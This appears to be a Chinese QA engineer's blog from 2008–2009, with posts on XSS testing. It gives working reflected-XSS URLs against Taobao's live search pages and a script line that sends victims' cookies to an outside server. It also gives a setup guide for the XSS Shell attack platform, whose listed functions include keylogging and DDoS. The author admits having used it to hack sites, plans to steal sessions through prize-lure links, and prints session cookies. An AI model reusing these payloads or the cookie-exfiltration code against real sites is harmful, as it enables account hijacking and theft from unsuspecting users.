【工作经历:阿里巴巴搜索技术研发中心QA ,百度新产品测试部QA】 【领域:测试分析,自动化测试,性能测试,安全测试 】 【个人定位:高级测试工程师+培训师+领域产品专家】

发布新日志

  • LoadRunner与watir的妙用

    2009-05-08 10:54:06

    决定使用loadrunner构造一个黑客常用的注入工具。我相信,这个工具比其他任何黑客工具都好用。不仅可以进行注入,还可以进行xss的探测。甚至还可以回放。呵呵。
    watir更有趣,可以更形象的观察每一步的变化。

    利用这个机会,去强化一下loadrunner和watir的知识。
    不要以为好久不用,变的生疏了。


  • blog异常

    2009-02-20 13:11:24

    今天意外的碰到了这个blog系统的错误,提示信息如下。
    竟然把sql给爆出来了。有意思。

    mysql经常会出现这类错误信息。最好是关掉为好。暴露了sql语句,容易让别人钻空子的。


    SupeSite info
    : MySQL Query Error

    User: sihanjishu
    Time: 2009-2-20 1:10pm
    Script: /index.php

    SQL: SELECT profile_1, profile_2, profile_3, profile_4, profile_5, profile_6, profile_7, profile_8, profile_9, profile_10, profile_11, profile_12, profile_13, profile_14, profile_15, profile_16, profile_17, profile_18, profile_19, profile_20, profile_21, profile_22, profile_23, profile_24, profile_25, profile_26, profile_27, profile_28, profile_29 FROM [Table]userfields WHERE uid='159438'
    Error: Unknown column 'profile_1' in 'field list'
    Errno.: 1054



  • [论坛] xss测试步骤优化

    2008-08-22 13:39:14

    xss测试的一般步骤,总结了一下,尽量让xss测试的步骤简单高效一些。

    测试xss一直很麻烦,一直想找个方法优化一下,经过几天的探索。终于找到了一个省时省力的方法。
    首先介绍一下需要的工具。
    xssshell是一个xss攻击平台。它首先需要搭建一个asp web服务器,将自身搭建起来,监听请求,
    然后在xss地方,嵌入一个外部脚本文件,这个脚本文件会定期的访问xssshell服务器上的文件内容,然后执行。
    这样就可以通过xssshell本身的服务,来动态的修改xss语句。(以前曾用这个黑过网站,刷过流量)
    网上也有另一个xss攻击平台,是beEF,linux上的,因为搭建比较复杂,就不提了。如果需要更好的功能,可以尝试一下。
    我的虚拟机是vpc,对linux的支持不好,没有办法。暂时不研究那个了。


    第一步,搭建xssshell,首先下载xssshell,
    官方地址  http://www.portcullis-security.com/16.php

    修改默认的密码和数据库文件的路径,然后自己搭建一个简易的web服务器,可以使用net box搭建。
    搭建好后,就可以访问管理员页面,查看其中的功能。

    具体的功能包括

    getCookie()
    Get victims active cookie
    getSelfHtml()
    Get victim's current page HTML Code
    alert(<message>)
    Send message to victim
    eval(<javascrīpt code>)
    Execute virtually anything in JS
    prompt(<question>)
    Play Truth or Dare
    getKeyloggerData()
    Get keylogger data
    getMouseLog()
    Get mouse log (every click in screen)
    getClipboard()
    Get clipboard data (only IE)
    getInternalIP()
    Get internal IP address (only Mozilla* + JVM)
    checkVisitedLinks(<url list>)
    Check victim's history (seperated by new line)
    getPage(<Relative URL Path>)
    Make a request with victim credentials
    DDoS(<url>)
    Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)
    Crash()
    Consume victim's CPU and force to crash/close.
    GetLocation()
    Get current URL of victim.

    同时xssshell提供了一个实例程序,请参考具体的说明。


    第二步,在目标xss页面中,想办法嵌入一个外部的脚本链接,也就是加入
    <scrīpt src="你的xssshell.asp的网络地址"></scrīpt>,这样就可以了。

    第三步,登录xssshell的后台管理页面,就可以发现,有个计算机上线了,而且还提示基本的国家标志。浏览器类型。
    然后,你就可以对主机进行各种功能的请求。比如发送消息,获得cookie,执行脚本,访问网页等等操作。

    第四步,此步是高级应用。使用XSSTunnel,详细功能可以参考官方的说明,可以通过xss进行一些服务请求。因为这些请求时通过xss进行的。所以,获得的权限和身份也是以对方的身份进行的。如果是网站的管理员点击了你的xss页面,那么,你就可以在本地通过xssstunnel进行一些管理员的操作。


    xss测试的目的就是让开发人员相信,xss能够引起的足够危害。所以,只要达到自己的目标就可以了。
    比如演示通过xss获得管理员权限,然后执行管理员操作。利用xss手机受害者的敏感信息等。到此为止就已经达到了测试的要求了,再深入就成hack了。
    第一步是个一劳永逸的工作,测试的时候,主要就是在xss处嵌入脚本,然后等待受害者上线就可以了。
    这样就精简了很多的流程,和一些重复的体力活。

    [ 本帖最后由 sihanjishu 于 2008-8-22 13:37 编辑 ]

    xssshell.jpg
  • 51testing上blog系统的一个小小bug

    2008-08-21 01:06:16

    在文章里插入链接的时候,尝试着写入'></scrīpt><scrīpt>alert(33)</scrīpt>。

    就会发现你的页面会弹框。显示结果也爆出了js的一些内容。这只是客户端的解析问题,

    这只能欺骗自己,没有危害的。

    本地解析出了问题,穿上服务器,还是没有任何问题。代码都已经经过过滤了。

    娱乐一下。

    本来是贴出其他网站的xss的,结果就发现来这个问题。


    分析一下,js的主要代码,这是添加链接的。

    var a = document.getElementById("wordEditer_Link_ADS").value;

    var v = document.getElementById("wordEditer_Link_TEXT").value;

    if(a == "") return;

    if(v == "") v = a;

    var html = "<a href='" + a + "' target=\"" + t + "\">" + v + "</a>";


    所以,添加的连接里,必须没有'和“, html变量最终会被打断,就乱了。这一切都是本地的操作。
    传入服务器上后,都是经过html编码的,不会有什么问题。

    所以,没有危害,只是娱乐而已。

    同时也发生了一次疏忽,因为我在开着工具调试,结果上网站的时候,忘记关了,直接生成了一大堆日志。
    无言了。




  • 淘宝的xss还真多

    2008-08-21 00:52:27

    淘宝的xss地方还真多。很奇怪。
    同样的参数,不同的模块过滤不一样。看来是和他们项目组当初开发的时候出现的问题。
    不是同一个人写的,所以,才有这样的差别。
    如下地址。个别参数基本上什么都没有过滤。

    http://search1.taobao.com/browse/0/n-g,pb4hq6dypb4hq6dy----------------40--commend-0-all-0.htm?at_topsearch='></scrīpt><scrīpt>alert(33)</scrīpt>



  • 淘宝搜索xss的再次分析

    2008-08-17 01:54:17

    这是一个非常低级的xss,连基本的冒号就没有过滤。看来是大意所致,其他的地方,都没有这个毛病。

    既然已经得到可以xss地方。我就直接使用外部脚本加载来执行一些操作。使用外部脚本加载
    http://192.168.0.15/test.js就是第三方的脚本文件。在脚本里可以随便写上一些证明的语句,比如alert。

    http://search1.taobao.com/browse/search_auction.htm?

    f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><scri

    pt%20src=http://192.168.0.15/test.js></scrīpt>&cat=&productCat=1&book_search=fuzzy_sr_all_text

    访问之后,成功的执行了外部js的文件。这样,我就可以有更多空间去完成自己的操作。
    在虚拟机上登录自己的淘宝帐号,然后在ie的地址栏中输入javascrīpt:alert(document.cookie)查看当前的cookie。

    真正的cookie

    ---------------------------
    Microsoft Internet Explorer
    ---------------------------
    uc1=_yb_=false&_msg_=0&_msg_v=true&cookie21=KwmMFB0d1nI9&cookie14=KPtF5EqaNsqDvQ%3D%

    3D&cookie15=dHJ1ZQ==&cookie16=LxCHKl404vvFNTkbknIAwYbDuw%3D%3D&cookie17=IZioVB3mclM%3D&existShop=false&existXShop=false;

    cookie2=a4eda691fb507c147b72295462ba10b8; t=cf6f6f6c37808b6701f6d9b69da117a3; _reg_table_=ONQYEVJBXCWPFTKGLZHIMRUDAS;

    _reg_name_=VyO3HBcFYdM%3D; _reg_first_time_date=KPtF5EqaN8X2j%2FP6Vg%3D%3D; cookie1=L0kKVuHbka5%

    2BsNZi9DhQXxbu4tf8obcF1sARtUrSoT4%3D; lastgetwwmsg=MTIxODg3Mjg1MQ%3D%3D; ssllogin; _ad_; _wwmsg_=0%2C0; btc=81000867%2B150402%

    3A50%3B150401%3A50%3B%3A%3B%3A%3B%3A%3B%3A; _sv_=0; tracknick=sihanjishu; tg=0; _cc_=Icgi8Z%2F1iA%3D%3D; _nk_=sihanjishu;

    user_tag_user_id=KpAfzyJUgA0JMCndQZVHJw%3D%3D
    ---------------------------
    OK   
    ---------------------------



    然后访问上面的构造的xss地址。同时修改js的脚本为alert(document.cookie)
    再次访问xss地址,结果发现,弹出了cookie的提示。



    修改js的脚本文件,这次通过js发送请求,把当前的cookie发送到网路上去。
    我在外部网络上新建一个web服务器,然后写一个接受请求的文件,把获得的请求保存起来。http://192.168.0.15/xssc.asp就是外部的用来保存请求数据的文件。

    js的内容

    new Image().src="http://192.168.0.15/xssc.asp?"+escape(document.cookie);


    再次访问上面构造的那个xss地址。成功的在外部计算机上得到了虚拟机里登录淘宝的cookie。
    收到的cookie内容。

    uc1=_msg_=0&_msg_v=true&cookie21=KwmMFB0d1nI9&cookie14=KPtF5EqaMaMA8Q%3D%

    3D&cookie15=dHJ1ZQ==&cookie16=LxCHKl404vvFNTkbknIAwYbDuw%3D%3D&cookie17=IZioVB3mclM%

    3D&existShop=false&existXShop=false&_yb_=false; cookie2=a4eda691fb507c147b72295462ba10b8; t=cf6f6f6c37808b6701f6d9b69da117a3;

    _reg_table_=ONQYEVJBXCWPFTKGLZHIMRUDAS; _reg_name_=VyO3HBcFYdM%3D; _reg_first_time_date=KPtF5EqaN8X2j%2FP6Vg%3D%3D;

    cookie1=L0kKVuHbka5%2BsNZi9DhQXxbu4tf8obcF1sARtUrSoT4%3D; lastgetwwmsg=MTIxODg3Mjg1MQ%3D%3D; ssllogin; _ad_; _wwmsg_=0%2C0;

    btc=81000867%2B150402%3A50%3B150401%3A50%3B%3A%3B%3A%3B%3A%3B%3A; _sv_=0; tracknick=sihanjishu; tg=0; _cc_=Icgi8Z%2F1iA%3D%3D;

    _nk_=sihanjishu; user_tag_user_id=KpAfzyJUgA0JMCndQZVHJw%3D%3D



    cookie不是完全一样,很奇怪,没有分析具体的原因。然后使用sessionIE,去访问得到的页面,竟然发现提示需要登录。
    看来是淘宝做什么限制了,不在同一台计算机的登录时不同的。这样的情况,在qq邮箱里也存在,应该是采用什么技术吧,以前听说过一点。

    既然得到cookie无法去访问后台,就表明暂时这个xss还是没有太大危害性的。



    现在换一个思路。既然得到cookie也无法操纵别人后台,那我就选择在xss的时候通过js去操纵。



    这时发现搜索页面,也就是那个存在xss的页面,竟然和淘宝的用户后台不在一个二级域名中,也就是说,可能不在同一个计算机上。这样xss的请求访问后台,是相当于跨域访问的。


    剩下的思路就是通过一些跨域的漏洞,去访问其他域名下的信息,比如操纵后台的操作,访问别人的站内信内容。
    我不知道淘宝的cookie设置的是否是二级域名区别的,如果可以访问同一根域名下的内容,这样就简单多了。


    这个xss的危害

    1、可能导致用户的信息泄漏。后台的数据遭到篡改。利用ie的跨域漏洞,可能会访问到很多的内容。
    2、可能会利用社工,用来欺骗用户的密码,在外部的js文件中,做一个登录的假页面,然后用户的用户名和密码。
    3、利用淘宝上的这个xss,直接在js中加载一些恶意代码,网页木马什么的。直接入侵用户的电脑。


    暂时研究到此为止吧。




  • 淘宝xss的简单分析

    2008-08-15 18:27:19


    bzcyer提到了一个淘宝的xss问题。
    帖子的地址
    http://bbs.51testing.com/thread-123477-1-1.html

    感觉很有意思,淘宝竟然连基本的xss符号都没有过滤。

    这是作者的原来的xss测试语句。
    >"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(21879)>

    简单修改一下
    >"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>

    监听http发送请求的过程。
    原始的正常请求
    http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=xxxxxxxxxx&cat=&productCat=1&book_search=fuzzy_sr_all_text

    修改请求为xss攻击语句。
    http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text

    没有成功,呵呵。
    忘记http请求会修改编码的,修正一下
    http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=javascrīpt:alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text

    这样就已经可以达到xss了。


    下一步就是黑客的做法了。

    修改xss语句为获取cookie,然后使用sessionIE,就可以操纵他的cookie了。因为快下班了。所以,没有时间继续研究了。如果深挖,可能会有更多的应用。

    以后再研究,给一个完整利用的方法。我不知道淘宝会不会有什么限制,比如即使获得session,仍然无法登陆对方的帐户。这就不得而知了。试验一下才知道。

    如果可以的话,利用起来就是欺骗了。

    将以上的xss连接发送给别人,说是中将之类的,别人点击之后,就会截获他的session,进行一些操作了。
    除非,淘宝做了闲置,否则,这是一个明显的漏洞和bug。




Open Toolbar